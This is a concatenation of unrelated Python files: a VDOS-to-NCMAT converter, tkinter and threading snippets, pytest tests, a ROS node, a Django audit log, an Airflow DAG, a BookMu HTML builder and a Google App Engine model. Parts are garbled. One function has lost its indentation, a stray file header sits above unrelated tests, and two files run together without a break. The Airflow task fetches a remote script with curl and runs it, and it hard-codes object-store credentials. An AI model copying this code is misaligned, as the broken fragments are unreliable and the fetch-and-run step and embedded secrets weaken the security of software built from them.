            #g1asym_pos = dos / ( egrid_eV * np.expm1(two_u) )
            g1sym = dos / (egrid_eV*np.sinh(0.5*two_u))
            plt.plot(egrid,g1sym,*aargs,**kwargs)
        else:
            plt.plot(egrid,dos,*aargs,**kwargs)
    import matplotlib as mpl
    mpl.rcParams['figure.dpi']=args.dpi
    #ability to quit plot windows with Q:
    if 'keymap.quit' in mpl.rcParams and not 'q' in mpl.rcParams['keymap.quit']:
        mpl.rcParams['keymap.quit'] = tuple(list(mpl.rcParams['keymap.quit'])+['q','Q'])
    import matplotlib.pyplot as plt
    plt.xlabel(vis_unit)
    plt_plot(egrid*vis_unit_fact,density,'o-',label=file_decoded['title'])
    if args.forceregular:
        plt_plot(regularised_egrid*vis_unit_fact,regularised_density,'x-',label='regularised')
    # Visualise each cutoff as the parabola that would replace the removed part.
    for c_idx, c_val in cutoffs:
        d=density[c_idx]
        # f(x)=k*x^2, f(c_val)=d<=> k*c_val^2 = d <=> k = d/c_val^2
        x=np.linspace(0.0,c_val,3000)
        plt_plot(x*vis_unit_fact,(d/c_val**2)*(x**2),label=f'with cutoff {c_val} eV')
    if args.debye:
        # Idealised Debye spectrum (quadratic up to the Debye energy) overlay.
        x=np.linspace(0.0,max(egrid.max(),args.debye),1000)
        y = np.where( x<=args.debye, x**2 * ( density.max() / args.debye**2 ), 0.0 )
        plt_plot(x*vis_unit_fact,y,
                 label=f'Debye spectrum (E_Debye={1000*args.debye:.5}meV, T_Debye={args.debye/nc_constants.constant_boltzmann:.5}K)')
    for r in (args.ref or []):
        eg,ds = getVDOSFromFile(r)
        plt_plot(eg*vis_unit_fact,ds,label=decodeFileName(r)['title'])
    plt.legend()
    plt.title(file_decoded['title'])
    plt.grid(ls=':')
    plt.show()
    sys.exit(0)
# Non-plot path: select the final (egrid,density) to emit.
if args.forceregular:
    egrid, density = regularised_egrid,regularised_density
else:
    egrid, density = applyCutoff(egrid,density,cutoffs)
#Check if egrid is linspace:
binwidth = (egrid[-1]-egrid[0])/(len(egrid)-1)
is_linspace=True
if not args.forceregular:
    # Tolerate up to 1% deviation in bin width before declaring non-linear.
    for i in range(len(egrid)-1):
        bw=egrid[i+1]-egrid[i]
        if abs(binwidth-bw)>0.01*binwidth:
            is_linspace=False
            break
if is_linspace:
    print('NB: Detected linearly spaced input egrid')
#normalise so unity at highest point (gives smaller file sizes):
density /= density.max()
#remove excess trailing zeros
while len(density)>10 and density[-2]==0.0 and density[-1]==0.0:
    density = density[0:-1]
    egrid = egrid[0:-1]
egrid_cnt =''
if is_linspace:
    # A linear grid is encoded compactly as just its (first, last) values.
    egrid_cnt += f' vdos_egrid {egrid[0]:.14} {egrid[-1]:.14}'
else:
    egrid_cnt += NC.formatVectorForNCMAT('vdos_egrid',egrid)
egrid_cnt += '\n'
egrid_cnt += NC.formatVectorForNCMAT('vdos_density',density)
if args.stdout:
    # Scripting mode: emit the generated NCMAT lines to stdout only.
    print("<<<GENERATED-CONTENT-BEGIN>>>")
    print(egrid_cnt,end='')
else:
    outfn=pathlib.Path('converted_output.ncmat')
    with outfn.open('wt') as fn:
        fn.write(f"""NCMAT v5
#Autogenerated file from {args_file_basename}.
@DENSITY
1.0 g_per_cm3 #FIX{'ME'}!! Please replace with proper value, or remove and optionally provide crystal structure!
@DYNINFO
element <UNKNOWN-PLEASE-EDIT>
fraction 1
type vdos\n""")
        fn.write(egrid_cnt)
        fn.write('\n')
    print(f"Wrote {outfn}")
|
from tkinter import *
from tkinter import filedialog
def saveFile():
    """Prompt for a destination file and write the editor's contents into it."""
    target = filedialog.asksaveasfile(
        initialdir="C:\\Users\\Marcus\\Documents\\python files",
        defaultextension='.txt',
        filetypes=[
            ("Text file", ".txt"),
            ("HTML file", ".html"),
            ("All files", ".*"),
        ])
    # asksaveasfile returns None when the user cancels the dialog.
    if target is None:
        return
    target.write(str(text.get(1.0, END)))
    target.close()
# Build a minimal editor window: a Save button above a padded text area.
window = Tk()
button = Button(text="Save", command=saveFile)
button.pack()
text = Text(window, font=("Ink Free", 20),
            height=8,
            width=20,
            padx=20,
            pady=20,)
text.pack()
window.mainloop()
def pets(petlist):
    """Print the contents of the file at *petlist*; silently skip missing files."""
    try:
        handle = open(petlist)
    except FileNotFoundError:
        return
    with handle:
        contents = handle.read()
    print(contents)
# Print each pet-name file that exists; missing files are skipped quietly.
FreimanPets = ['text_files/cats.txt', 'text_files/dogs1.txt']
for petnames in FreimanPets:
    pets(petnames)
"""
The data points are uniformly distributed on a unit sphere.
To generate these 3-dimensional points, we first generate standard
normally distributed points as vectors lying in 3D space, and then
normalize these vectors (X:= X / ||X||) to make it lie on a sphere
(S^2) which acts as an embedded manifold in 3-D ambient space.
"""
import numpy as np
def sample_spherical(npoints, ndim=3):
    """Return *npoints* uniform samples on the unit sphere in R^ndim.

    Draws standard-normal vectors (columns of an (ndim, npoints) array) and
    projects each onto the unit sphere by dividing by its Euclidean length.
    """
    gaussian = np.random.randn(ndim, npoints)
    lengths = np.linalg.norm(gaussian, axis=0)
    return gaussian / lengths
"""
phi = np.linspace(0, np.pi, 20)
theta = np.linspace(0, 2 * np.pi, 40)
x = np.outer(np.sin(theta), np.cos(phi))
y = np.outer(np.sin(theta), np.sin(phi))
z = np.outer(np.cos(theta), np.ones_like(phi))
"""
xi, yi, zi = sample_spherical(1000)
data_points = []
map(lambda x,y,z : data_points.append((x,y,z)), xi,yi,zi)
dictionary_datapoints = {k:np.array(v) for k,v in enumerate(data_points)}
chart1, chart2, chart3, chart4, chart5, chart6 = (dict() for _ in range(6))
def CreateCharts(dictionary_datapoints, return_for_evaluating=False):
    """
    Creating the 6 charts of the sphere. This code snippet maps 6 hemispheres
    homeomorphically to 6 different open regions in R^2 (discs). For e.g. :
    the maps (x, y, z) -> (x, y), and its inverse (x, y) ->
    (x, y, squareroot(1-x^2-y^2)), are continuous maps from the open
    hemisphere (for which z <= 0) to open disk x^2 + y^2 < 1
    and from the open disk back to sphere (S^2), respectively.
    Here, the homeomorphisms can be thought of instances of the map:
    Gi : S^2 -> Ui, where Ui is the 'i'th chart
    """
    # BUGFIX: dict.iteritems() does not exist in Python 3; items() behaves
    # the same here and also works on Python 2.
    for i, point in dictionary_datapoints.items():
        if point[2] > 0:
            chart1[i] = point[:2]  # drop z: project onto (x, y)
        else:
            chart2[i] = point[:2]
        if point[1] > 0:
            chart3[i] = point[::len(point)-1]  # first and last coords: (x, z)
        else:
            chart4[i] = point[::len(point)-1]
        if point[0] > 0:
            chart5[i] = point[1:]  # drop x: project onto (y, z)
        else:
            chart6[i] = point[1:]
    if return_for_evaluating:
        return (chart1, chart2, chart3, chart4, chart5, chart6)


CreateCharts(dictionary_datapoints)
# Convenient name -> chart mapping for downstream consumers.
dictionary_of_charts = {
    'chart1' : chart1,
    'chart2' : chart2,
    'chart3' : chart3,
    'chart4' : chart4,
    'chart5' : chart5,
    'chart6' : chart6,
}
|
import threading
import datetime
import re
import sys
import time
def thread(input,thread_id):
    # Worker body (run via threading.Timer): prints a greeting once per
    # second, polling the shared ThreadPool each iteration for a stop signal.
    for i in range(6):
        tp = ThreadPool()
        self_timer = tp.pool.get(thread_id)
        # A pool entry of -1 is the cooperative "please stop" signal;
        # exit() raises SystemExit, ending this worker.
        if self_timer==-1:
            exit()
        print('hello+'+str(input))
        time.sleep(1)
        if i == 2:
            print('stop')
def change(input):
    # Rebinding the parameter only changes the local name; the caller's
    # argument is untouched (demonstrates Python's assignment semantics).
    input = 0
# for i in range(3):
# th = threading.Thread(target=thread, args=(i,))
# th.start()
#input = 11
# change(input)
# print(input)
class StoppableThread(threading.Thread):
    """Thread class with a stop() method. The thread itself has to check
    regularly for the stopped() condition."""
    def __init__(self, *args, **kwargs):
        super(StoppableThread, self).__init__(*args, **kwargs)
        self.__flag = threading.Event()  # event used to pause the thread
        self.__flag.set()  # set to True (not paused)
        self.__running = threading.Event()  # event used to stop the thread
        self.__running.set()  # set running to True
    def pause(self):
        self.__flag.clear()  # set to False, so the thread blocks
    def resume(self):
        self.__flag.set()  # set to True, so the thread unblocks
    def stop(self):
        self.__flag.set()  # resume the thread first, in case it was paused
        self.__running.clear()  # set running to False
    def run(self):
        print('hello')
        self.stop()
        print('hello')
#thread(self, input)
#st = StoppableThread()
# st.start()
def judgeTime(post_date, days_ago):
constraint_date = (datetime.datetime.now() +
datetime.timedelta(days=-days_ago)).strftime("%Y-%m-%d")
m_constraint = re.match(r'(\d{4})-(\d{2})-(\d{2})', constraint_date)
constraint_year = m_constraint.group(1)
constraint_month = m_constraint.group(2)
constraint_day = m_constraint.group(3)
try:
m_date = re.match(r'(\d{4})-(\d{2})-(\d{2})', post_date)
if int(constraint_year) < int(m_date.group(1)):
return True
if int(constraint_year) == int(m_date.group(1)):
if int(constraint_month) < int(m_date.group(2)):
return True
if int(constraint_month) == int(m_date.group(2)):
if int(constraint_day) < int(m_date.group(3)):
return True
if int(constraint_day) == int(m_date.group(3)):
return True
except:
print('process time error')
return False
# print(judgeTime('2019-06-01',10))
class ThreadPool(object):
    """Tiny registry of timers shared by every ThreadPool instance.

    The mapping lives on the class itself, so all instances read and write
    the same underlying dict through the ``pool`` property.
    """

    _pool = {}

    @property
    def pool(self):
        # Every instance exposes the single class-level registry.
        return ThreadPool._pool

    @pool.setter
    def pool(self, new_pool):
        # Replacing the pool swaps the registry for all instances at once.
        ThreadPool._pool = new_pool
# Thread pool management test: start two 1-second Timer threads, register
# them in the shared pool, then signal the first one to stop via the pool.
thread_count=0
tp = ThreadPool()
# first
timer = threading.Timer(1, thread, [1,thread_count])
tp.pool[thread_count]=timer
thread_count+=1
# another
timer_2 = threading.Timer(1, thread, [2,thread_count])
tp.pool[thread_count]=timer_2
thread_count+=1
print(tp.pool)
timer.start()
timer_2.start()
# close one thread
time.sleep(4)
tp.pool[0]=-1
|
#!/usr/bin/python
# -*- coding:utf-8 -*-
# @Time :2019-11-06 16:55
# @Author: cd
# @FileName:pye_001.py
# @Copyright: @2019-2020
# Use the sleep() function from the time module.
from horst import Horst
from horst.versioning import bumpversion, UpdateBumpConfig, CreateBumpConfig, RunBumpVersion, _render_int_bump_config
from os import path
import horst.versioning
import pytest
@pytest.fixture(autouse=True)
def set_up_horst():
    # Give every test a fresh Horst instance and invalidate its state afterwards.
    horst = Horst(__file__)
    yield
    horst._invalidate()
here = path.dirname(__file__)


def test_bumpversion_nothing_existing():
    """With no config present, bumpversion() creates, updates and then runs."""
    tasks = list(map(lambda x: x.__class__, bumpversion()))
    # The original also computed an unused expected_bump_conf_file path that
    # asserted nothing; it has been removed.
    assert tasks == [CreateBumpConfig, UpdateBumpConfig, RunBumpVersion]
def test_bumpversion_does_not_create_new_config_if_one_exists(monkeypatch):
    """An existing bump config must suppress the CreateBumpConfig step."""
    # BUGFIX: the original assigned the lambda directly onto the module and
    # never restored it, leaking the patch into every subsequent test; the
    # pytest monkeypatch fixture undoes it automatically.
    monkeypatch.setattr(horst.versioning, "_bump_version_config_exists", lambda x: True)
    tasks = [x.__class__ for x in bumpversion()]
    assert tasks == [UpdateBumpConfig, RunBumpVersion]
def test_bumpconfig_init_rendering():
    # Render the initial bump config and compare with the literal template.
    text = _render_int_bump_config(["setup.py"], True, True)
    # NOTE(review): "[bumbversion]" looks like a typo for "[bumpversion]";
    # if so it is mirrored inside _render_int_bump_config -- confirm there
    # before fixing either side.
    expected_text = """
[bumbversion]
current_version = 0.0.1
commit = True
tag = True
[bumpversion:file:setup.py]
""".lstrip()
    assert expected_text == text
|
import rospy
from std_msgs.msg import String
rospy.init_node('PrimNo')
def matricCallBack(msg):
    """Print the payload of each message received on /topico2."""
    print(msg.data)
def timerCallBack(event):
    # Periodically publish the fixed registration number string on /topico1.
    msg = String()
    msg.data = '2017016162'
    pub.publish(msg)
# Wire up the publisher, the 1-second publish timer and the subscriber,
# then hand control to ROS until shutdown.
pub = rospy.Publisher('/topico1', String, queue_size=1)
rospy.Timer(rospy.Duration(1), timerCallBack)
rospy.Subscriber('/topico2', String, matricCallBack)
rospy.spin()
from __future__ import unicode_literals
from django.db import models
# Create your models here.
from django.db import models
from django.db.models.signals import pre_save, post_delete
from django.dispatch import receiver
from student.models import Student
from group.models import Group
# Create your models here.
# Change kinds recorded in the audit log.
TYPES = (
    ('C', 'Created'),
    ('M', 'Modified'),
    ('D', 'Deleted')
)


class Loginsys(models.Model):
    # Audit-log entry recording a create/modify/delete of a Student or Group.
    create_date = models.DateTimeField('Date', auto_now=True)  # stamped on save
    type = models.CharField('Type', choices=TYPES, max_length=1)
    model = models.CharField('Class', max_length=200)
    log = models.CharField('Log', max_length=250)

    def __unicode__(self):
        return "%s: %s" % (self.create_date.strftime("%d.%m.%Y %H:%M"), self.log)
@receiver(pre_save, sender=Student)
@receiver(pre_save, sender=Group)
def model_save_signal(sender, instance, signal, *args, **kwargs):
    """Record a 'created' or 'modified' audit entry before a Student/Group save."""
    # BUGFIX: the original instantiated an undefined name ``Logger``; the
    # audit model defined in this module is ``Loginsys``.
    h = Loginsys()
    h.model = str(sender)
    try:
        # An existing primary key means this save is a modification.
        sender.objects.get(pk=instance.pk)
        h.type = 'M'
        h.log = 'modified'
    except sender.DoesNotExist:
        h.type = 'C'
        h.log = 'created'
    h.log = 'Object <%s> ' % instance + h.log
    h.save()
@receiver(post_delete, sender=Student)
@receiver(post_delete, sender=Group)
def model_delete_signal(sender, instance, signal, *args, **kwargs):
    """Record a 'deleted' audit entry after a Student/Group is removed."""
    # BUGFIX: the original instantiated an undefined name ``Logger``; the
    # audit model defined in this module is ``Loginsys``.
    h = Loginsys()
    h.model = str(sender)
    h.type = 'D'
    h.log = 'Object <%s> was deleted' % instance
    h.save()
|
from airflow import DAG
from airflow.contrib.operators.kubernetes_pod_operator import KubernetesPodOperator
from airflow.utils.dates import days_ago
# Default arguments shared by every task in the DAG.
args = {
    "project_id": "etl-1012105319",
}

# One-shot DAG generated by the Elyra pipeline editor.
dag = DAG(
    "etl-1012105319",
    default_args=args,
    schedule_interval="@once",
    start_date=days_ago(1),
    description="Created with Elyra 3.1.1 pipeline editor using `etl.pipeline`.",
    is_paused_upon_creation=False,
)

# Notebook task: bootstraps the Elyra runtime in an Anaconda pod and runs
# input/input-data.ipynb, staging artifacts via the configured object store.
op_a8cc213a_6708_48c2_812b_046d1246bc9b = KubernetesPodOperator(
    name="input",
    namespace="airflow",
    image="continuumio/anaconda3:2020.07",
    cmds=["sh", "-c"],
    arguments=[
        "mkdir -p ./jupyter-work-dir/ && cd ./jupyter-work-dir/ && curl -H 'Cache-Control: no-cache' -L https://raw.githubusercontent.com/elyra-ai/elyra/v3.1.1/elyra/airflow/bootstrapper.py --output bootstrapper.py && curl -H 'Cache-Control: no-cache' -L https://raw.githubusercontent.com/elyra-ai/elyra/v3.1.1/etc/generic/requirements-elyra.txt --output requirements-elyra.txt && python3 -m pip install packaging && python3 -m pip freeze > requirements-current.txt && python3 bootstrapper.py --cos-endpoint http://myminio.server:9000 --cos-bucket store --cos-directory 'etl-1012105319' --cos-dependencies-archive 'input-data-a8cc213a-6708-48c2-812b-046d1246bc9b.tar.gz' --file 'input/input-data.ipynb' "
    ],
    task_id="input",
    env_vars={
        "ELYRA_RUNTIME_ENV": "airflow",
        # NOTE(review): object-store credentials are hard-coded here; they
        # should come from a secret backend/connection instead.
        "AWS_ACCESS_KEY_ID": "minioadmin",
        "AWS_SECRET_ACCESS_KEY": "minioadmin",
        "ELYRA_ENABLE_PIPELINE_INFO": "True",
        "ELYRA_RUN_NAME": "etl-1012105319-{{ ts_nodash }}",
    },
    in_cluster=True,
    config_file="None",
    dag=dag,
)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import getopt
import os.path
import re
import sys
class Formatter():
    """Inline-markup formatter: converts BookMu span markup to HTML."""
    @staticmethod
    def format(str):
        # Handle {_xxx_} for italics.
        m = re.match(r'^(.*)\{_(.+?)_\}(.*)$', str)
        if m:
            pre = m.group(1)
            content = m.group(2)
            post = m.group(3)
            # Recurse on the pieces so multiple/nested spans are handled.
            str = Formatter.format(pre)
            str += '<i>' + Formatter.format(content) + '</i>'
            str += Formatter.format(post)
        # Convert 3 or more dashes into a long dash.
        m = re.match(r'^(?P<pre>.*[^-])?(?P<dashes>[-]{3,})(?P<post>[^-].*)?$', str)
        if m:
            pre = m.group('pre')
            dashes = m.group('dashes')
            post = m.group('post')
            str = ''
            if pre:
                str += Formatter.format(pre)
            str += '<span class="longdash">' + ('–' * len(dashes)) + '</span>'
            if post:
                str += Formatter.format(post)
        # Handle {/} for line break.
        str = str.replace("{/}", "<br/>")
        # Force non-breaking spaces around some punctuation.
        # NOTE(review): the replacement strings should contain a non-breaking
        # space next to the guillemet; confirm the NBSP survived copy/paste.
        str = str.replace("« ", "« ")
        str = str.replace(" »", " »")
        return str
# Tables are structured as follows:
# ++-----+-----+-----+ <-- start of table
# +| x1 | x2 | x3a | <-- start of row 1 'x'
# | | | x3b |
# +| y1 | y2 | y3 | <-- start of row 2 'y'
# ++-----+-----+-----+ <-- end of table
#
# New rows start with '+|'.
# Continuation rows start with ' |'.
# Cells are separated by '|' (except for start/end table, which use '+')
# Cell data can span multiple rows.
class TableParser():
    """Parser for table in BookMu."""
    def __init__(self, parser):
        self.parent = parser  # owning Parser, used for error reporting
        self.reset()
    def reset(self):
        self.data = []  # completed rows, each a list of cell HTML strings
        self.num_cols = 0
        self.formatting = []
        self.reset_row()
    def reset_row(self):
        self.curr_row = ['' for i in range(0, self.num_cols)]
        self.valid_row = False
    def start_table(self, line):
        # The '++--+--+' border line defines the column count.
        cols = line[2:-1].split('+')
        self.num_cols = len(cols)
        self.reset_row()
    def end_table(self):
        self.add_row_to_table()
    def add_row_to_table(self):
        # Flush the current row (if any cell data was added) into self.data.
        if not self.valid_row:
            return
        self.data.append(self.curr_row)
        self.reset_row()
    def add_line_to_row(self, line):
        # Append this line's cell fragments onto the current row's cells
        # (cell contents may span several physical lines).
        data = line[2:-1].split('|')
        if len(data) != self.num_cols:
            self.parent.error('Incorrect num of columns in table row')
        for i in range(0, self.num_cols):
            self.curr_row[i] += Formatter.format(data[i])
        self.valid_row = True
    # Alignment info:
    # Horizontal alignment is typically inferred from the position of
    # the text in the cell, but it can be explicitly specified using
    # an alignment line:
    # @|H V|
    #
    # H = horizontal alignment:
    # '<' (left), ':' (center), '.' (split), '>' (right), ' ' (infer)
    # V = vertical alignment:
    # '^' (top), '-' (center), 'v' (bottom)
    #
    # By default, H = ' ' and V = '^'
    #
    # The 'split' horizontal alignment requires that a split point be specified
    # with ':':
    # @|. : v|
    # +| 20 |
    # +| 1370 |
    # +| 0.5 |
    # Everything up to and including the split point will be right-aligned
    # and everything after the split point will be left aligned.
    def record_alignment_info(self, line):
        # Ignore alignment info for now.
        pass
    # Return True when the last line of the table is read.
    def process_line(self, line):
        m = re.match(r'^\+\+[-+]+\+', line)
        if m:
            self.end_table()
            return True
        if '\t' in line:
            self.parent.error('Tab characters are not allowed in tables')
        prefix = line[0:2]
        if prefix == '+|':
            # New row: flush the previous one first.
            self.add_row_to_table()
            self.add_line_to_row(line)
        elif prefix == ' |':
            # Continuation of the current row.
            self.add_line_to_row(line)
        elif prefix == '@|':
            self.record_alignment_info(line)
        else:
            self.parent.error('Unrecognized table line')
        return False
    def generate_html(self):
        # Emit the accumulated rows as a plain HTML table, collapsing runs
        # of whitespace inside each cell.
        html = '<table class="dataTable">'
        for row in self.data:
            html += '<tr>'
            for col in row:
                html += '<td>%s</td>' % re.sub(r'[ \t]+', ' ', col).strip()
            html += '</tr>'
        html += '</table>'
        return html
class Parser():
    """Build script for parsing BookMu texts."""
    def __init__(self):
        self.page_num = None
        self.add_page_num = False
        self.line_num = None
        self.curr_line = None
        self.section_id = 0
        self.paragraph_id = 0
        self.reset_paragraph()
        self.note_id = 0
        self.reset_note()
        # Dictionary with count of all words found in doc.
        self.dict = {}
        self.table = TableParser(self)
        self.in_table = False
    def error(self, msg):
        # Report a fatal parse error (with location when known) and exit.
        if self.line_num and self.curr_line:
            print 'Error (line %d): %s' % (self.line_num, msg)
            print 'Line: %s' % self.curr_line
        else:
            print 'Error: %s' % (msg)
        sys.exit(1)
    def reset_paragraph(self):
        self.in_paragraph = False
        self.paragraph = []
    def reset_note(self):
        self.in_note = False
        self.note = []
    def write_paragraph(self):
        # Emit the accumulated paragraph lines as one <p> with a self-link.
        text = ' '.join([x.strip() for x in self.paragraph])
        text = Formatter.format(text)
        if '{' in text or '}' in text:
            self.error("Unhandled { brace }: " + text)
        self.paragraph_id += 1
        id = self.paragraph_id
        self.outfile.write('<p id="b%d"><a class="plink" href="#b%d"></a>' % (id, id))
        self.outfile.write(text + '</p>\n')
        self.reset_paragraph()
    def write_note(self):
        # Emit the accumulated note as a checkbox-toggled inline footnote,
        # appended to the current paragraph.
        self.note_id += 1
        note = '<label for="n%d" class="note-label"></label>' % self.note_id
        note += '<input type="checkbox" id="n%d" class="note-checkbox"/>' % self.note_id
        note += '<span class="note">'
        note += ' '.join([x.strip() for x in self.note])
        note += '</span>'
        self.paragraph.append(note)
        self.reset_note()
    def write_table(self):
        self.outfile.write(self.table.generate_html())
        self.outfile.write('\n')
    def record_page_num(self, page_num):
        # Remember a page number until the next output point consumes it.
        if self.page_num != None or self.add_page_num:
            self.error('Unprocessed page number: %s' % self.page_num)
        self.page_num = page_num
        self.add_page_num = True
    def calc_page_num_link(self):
        if not self.add_page_num:
            self.error('Attempting to add undefined page num')
        p = int(self.page_num)
        # Reset page num when we calc the link.
        self.page_num = None
        self.add_page_num = False
        return '<span class="pagenum" id="pg%d"><a href="#pg%d">[p.%d]</a></span>' % (p, p, p)
    # Process an entire line from the file.
    def process_line(self, line):
        self.line_num += 1
        self.curr_line = line
        line = line.rstrip()
        # Process comments.
        m = re.match(r'^--', line)
        if m:
            # Page number.
            # Note that page numbers can occur in the middle of a paragraph.
            m = re.match(r'^--page (\d+)\s*$', line)
            if m:
                self.record_page_num(m.group(1))
                return
            m = re.match(r'^---$', line)
            if m:
                if self.in_paragraph:
                    self.error('Horizontal rule lines may only occur between paragraphs: %s' % line)
                self.outfile.write('<hr/>\n')
                return
            # All other '--' comments are ignored.
            return
        if self.in_table:
            done = self.table.process_line(line)
            if done:
                self.write_table()
                self.in_table = False
            return
        # A figure in the text.
        # Figures are added to the current paragraph. If there is no current paragraph,
        # a new one is started.
        m = re.match(r'^{figure (large) "(.+)" "(.+)"}\s*$', line)
        if m:
            size = m.group(1)
            caption = m.group(2)
            filename = m.group(3)
            if self.add_page_num:
                self.paragraph.append(self.calc_page_num_link())
            figure = '<span class="figure"><a href="img/%s.jpg"><img class="block-image-%s" src="img/%s.png"/></a><br/><span class="caption">%s</span></span>' % (filename, size, filename, caption)
            self.paragraph.append(figure)
            self.in_paragraph = True
            return
        # ----------------
        # Frontmatter tags
        # ----------------
        # These should only occur in the frontmatter section at the start of the document.
        m = re.match(r'^{title (x-small|small|medium|large) "(.+)"}\s*$', line)
        if m:
            size = m.group(1)
            title = m.group(2)
            self.outfile.write('<div class="title frontmatter-%s"/>%s</div>\n' % (size, title))
            return
        m = re.match(r'^{frontmatter (x-small|small|medium|large) "(.+)"}\s*$', line)
        if m:
            size = m.group(1)
            title = m.group(2)
            self.outfile.write('<div class="frontmatter frontmatter-%s"/>%s</div>\n' % (size, title))
            return
        # ---------------
        # Footnote markup
        # ---------------
        # These should only occur within a paragraph.
        # Footnotes/endnotes.
        # Must be indented with tab.
        if len(line) != 0 and line[0] == '\t':
            # Single-line note: {^ ... ^} on one tab-indented line.
            mNote = re.match(r'^\t\{\^(.+)\^\}$', line)
            if mNote:
                self.note.append(mNote.group(1))
                self.write_note()
                return
            else:
                # Multi-line note: opening {^, continuation lines, closing ^}.
                mNoteStart = re.match(r'^\t\{\^(.+)$', line)
                if mNoteStart:
                    self.note.append(mNoteStart.group(1))
                    self.in_note = True
                    return
                mNoteEnd = re.match(r'^\t(.+)\^\}$', line)
                if mNoteEnd:
                    self.note.append(mNoteEnd.group(1))
                    self.write_note()
                    return
                if self.in_note:
                    self.note.append(line)
                    return;
                self.error("Unexpected tab-indent line: " + line)
        # --------------
        # Top-level tags
        # --------------
        # These should only occur outside a paragraph.
        # Section heading.
        m = re.match(r'^{section "(.+)"}\s*$', line)
        if m:
            section_name = m.group(1)
            if self.in_paragraph:
                self.error('Section tags may only occur between paragraphs: %s' % line)
            self.section_id += 1
            self.outfile.write('<h1 id="s%d">' % (self.section_id))
            if self.add_page_num:
                self.outfile.write(self.calc_page_num_link())
            self.outfile.write('%s</h1>\n' % (section_name))
            return
        # An unnumbered image in the text.
        m = re.match(r'^{image (small) "(.+)"}\s*$', line)
        if m:
            size = m.group(1)
            filename = m.group(2)
            if self.in_paragraph:
                self.error('Image tags may only occur between paragraphs: %s' % line)
            self.outfile.write('<a href="img/%s.jpg"><img src="img/%s.png" class="block-image-%s"/></a>\n' % (filename, filename, size))
            return
        # ------------
        # Table markup
        # ------------
        m = re.match(r'^\+\+[-+]+\+', line)
        if m:
            # Start new table
            self.in_table = True
            self.table.reset()
            self.table.start_table(line)
            return
        # ------------------
        # Paragraph handling
        # ------------------
        # Fall-through case to handle basic paragraph text.
        line = line.lstrip()
        if line == '':
            # Blank line terminates the current paragraph.
            if self.in_paragraph:
                self.write_paragraph()
            return
        if self.add_page_num:
            self.paragraph.append(self.calc_page_num_link())
        self.paragraph.append(line)
        self.in_paragraph = True;
    def write_html_header(self, title):
        self.outfile.write('<!DOCTYPE html>\n')
        self.outfile.write('<html lang="en">\n')
        self.outfile.write('<head>\n')
        self.outfile.write('\t<meta charset="utf-8" />\n')
        self.outfile.write('\t<meta http-equiv="X-UA-Compatible" content="IE=edge" />\n')
        self.outfile.write('\t<meta name="viewport" content="width=device-width, initial-scale=1" />\n')
        self.outfile.write('\t<title>%s</title>\n' % title)
        self.outfile.write('\t<link href="https://fonts.googleapis.com/css?family=Old+Standard+TT:400,400italic,700" rel="stylesheet" type="text/css" />\n')
        self.outfile.write('\t<link href="book.css" rel="stylesheet" type="text/css" />\n')
        self.outfile.write('</head>\n')
        self.outfile.write('<body>\n')
        self.outfile.write('<div class="container">\n')
    def write_html_footer(self):
        self.outfile.write('</div>\n')
        self.outfile.write('</body>\n')
        self.outfile.write('</html>\n')
    def process(self, src, dst):
        # Convert the BookMu file at src into an HTML file at dst.
        if not os.path.isfile(src):
            self.error('File "%s" doesn\'t exist' % src)
        try:
            infile = open(src, 'r')
        except IOError as e:
            self.error('Unable to open "%s" for reading: %s' % (src, e))
        try:
            outfile = open(dst, 'w')
        except IOError as e:
            self.error('Unable to open "%s" for writing: %s' % (dst, e))
        self.outfile = outfile
        self.write_html_header('City of Carcassonne')
        self.line_num = 0
        for line in infile:
            self.process_line(line)
        self.write_html_footer()
        outfile.close()
        infile.close()
    def add_to_dict(self, word, line):
        # Print entire line for word.
        # Useful for tracking down short typo words.
        #if word == 'hom':
        #	print self.id, line
        if not word in self.dict:
            self.dict[word] = 0
        self.dict[word] += 1
    def write_dict(self):
        # Dump the word-frequency dictionary, most frequent first.
        dst = 'dict.txt'
        try:
            outfile = open(dst, 'w')
        except IOError as e:
            self.error('Unable to open "%s" for writing: %s' % (dst, e))
        for word in sorted(self.dict, key=self.dict.get, reverse=True):
            outfile.write('%d %s\n' % (self.dict[word], word))
        outfile.close()
def usage():
    # Print command-line help for this (Python 2) build script.
    print 'Usage: %s <options>' % sys.argv[0]
    print 'where <options> are:'
    print '  --config <config-file-name>'
    print '  --dict' # write word frequency dict
    print '  --verbose' # verbose debug output
def load_config(file):
    """Parse a simple key=value config file into a dict.

    Blank lines and lines starting with '#' are skipped.  Values 'True' and
    'False' become booleans; values containing ',' become lists; everything
    else stays a string.  Exits the program if the file cannot be opened.
    """
    config = {}
    try:
        config_file = open(file, 'r')
    except IOError as e:
        print('Error - Unable to open config file "%s": %s' % (file, e))
        sys.exit(1)
    for line in config_file:
        line = line.strip()
        if line == '' or line[0] == '#':
            continue
        # BUGFIX: split only on the first '=' so values may themselves
        # contain '=' (the original raised ValueError on such lines).
        (k, v) = line.split('=', 1)
        if v == 'True':
            config[k] = True
        elif v == 'False':
            config[k] = False
        elif ',' in v:
            config[k] = v.split(',')
        else:
            config[k] = v
    config_file.close()
    return config
def main():
    # Parse options; -d/--dict additionally dumps the word-frequency dict.
    try:
        opts, args = getopt.getopt(sys.argv[1:],
                'dv',
                ['dict', 'verbose'])
    except getopt.GetoptError:
        usage()
        exit()
    write_dict = False
    verbose = False
    for opt, arg in opts:
        if opt in ('-d', '--dict'):
            write_dict = True
        elif opt in ('-v', '--verbose'):
            verbose = True
    # The raw input file (with the Plotto text).
    infilename = 'texts/city-of-carcassonne/cityofcarcassonn00viol.txt'
    outfilename = 'texts/city-of-carcassonne/out.html'
    print 'Building', outfilename, '...'
    parser = Parser()
    parser.process(infilename, outfilename)
    if write_dict:
        parser.write_dict()

if __name__ == '__main__':
    main()
|
#!/usr/bin/env python
# Python libraries
import os
import cgi
import urllib
import json
# Google App Engine api
from google.appengine.api import users
from google.appengine.ext import ndb
from google.appengine.ext import blobstore
from google.appengine.ext.webapp import blobstore_handlers
from google.appengine.api import mail
# Web libraries
import webapp2
import jinja2
# Jinja2 environment rooted at this file's directory, with autoescaping.
JINJA_ENVIRONMENT = jinja2.Environment(
    loader = jinja2.FileSystemLoader(os.path.dirname(__file__)),
    extensions = ['jinja2.ext.autoescape']
)
class Item(ndb.Model):
    # Datastore model for one item offered for sale.  'confirmed' marks
    # items whose purchase has been finalized by the buyer.
    name = ndb.StringProperty(required=True)
    item_type = ndb.StringProperty(required=True, choices=['Book', 'Electronic Product', 'Stationery', 'Other'])
    description = ndb.StringProperty(indexed=False)
